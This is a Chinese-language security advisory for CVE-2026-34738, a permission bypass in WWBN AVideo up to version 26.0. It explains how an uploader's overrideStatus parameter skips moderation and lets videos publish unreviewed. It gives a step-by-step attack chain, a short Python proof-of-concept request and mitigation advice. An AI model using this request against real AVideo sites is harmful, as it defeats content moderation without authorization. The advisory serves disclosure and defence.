CVE-2026-34738 CVSS 4.3 中危

CVE-2026-34738 WWBN AVideo权限绕过漏洞

披露日期: 2026-03-31

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-34738

漏洞类型

权限绕过

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

WWBN AVideo

漏洞概述

WWBN AVideo是一个开源视频平台。在26.0及更早版本中，其视频处理管道存在权限绕过漏洞。攻击者可利用`overrideStatus`请求参数，在拥有上传权限的情况下，绕过管理员审核机制，直接将视频状态设置为“active”（发布）。该漏洞是由于`setStatus()`方法未验证调用者权限导致的，破坏了内容审核流程。

技术细节

该漏洞的核心在于AVideo后端的`setStatus()`方法存在逻辑缺陷。当系统处理视频状态变更时，该方法仅对传入的状态码（如代表发布的“a”）进行格式校验，确认其属于系统已知的有效状态，但完全缺失了对当前操作者权限的校验步骤。正常业务逻辑下，将视频从“待审核”或“草稿”状态变更为“发布”状态应仅限管理员操作。然而，由于未实施权限控制，任何拥有基础上传权限的普通用户，只需在上传或更新视频的请求中添加`overrideStatus`参数并赋予特定值，即可欺骗服务器执行状态更新。这导致了业务逻辑层面的访问控制失效，使得未授权的内容发布成为可能。

攻击链分析

STEP 1

步骤1

攻击者注册普通账号并获取上传权限。

STEP 2

步骤2

攻击者上传一个视频文件，此时视频通常处于“待审核”或“草稿”状态。

STEP 3

步骤3

攻击者拦截或构造发送给服务器的视频处理请求，在参数中注入`overrideStatus=a`。

STEP 4

步骤4

服务器接收请求，`setStatus()`方法仅校验参数有效性而未校验权限，直接将视频状态改为“active”。

STEP 5

步骤5

视频绕过审核流程直接在前台发布，普通用户可见。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL for video status update (example endpoint)
url = "http://target-site/avideo/objects/video.json"

# Attacker's session cookie (low privilege user with upload rights)
cookies = {
    "PHPSESSID": "attacker_session_id"
}

# Payload containing the vulnerable parameter
# The 'overrideStatus' parameter forces the status to 'a' (active)
data = {
    "id": "123",  # ID of the uploaded video
    "title": "Malicious Video",
    "status": "a",  # Standard status parameter
    "overrideStatus": "a"  # VULNERABLE PARAMETER: Bypasses permission checks
}

# Send the POST request to update the video
response = requests.post(url, data=data, cookies=cookies)

if response.status_code == 200:
    print("Video status potentially bypassed moderation.")
else:
    print("Request failed.")

影响范围

WWBN AVideo <= 26.0

防御指南

临时缓解措施

建议在官方发布补丁前，暂时限制普通用户的视频上传功能，或通过Web应用防火墙（WAF）规则拦截包含“overrideStatus”参数的HTTP请求。同时，管理员应加强人工审核机制，对已发布的内容进行回溯检查。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表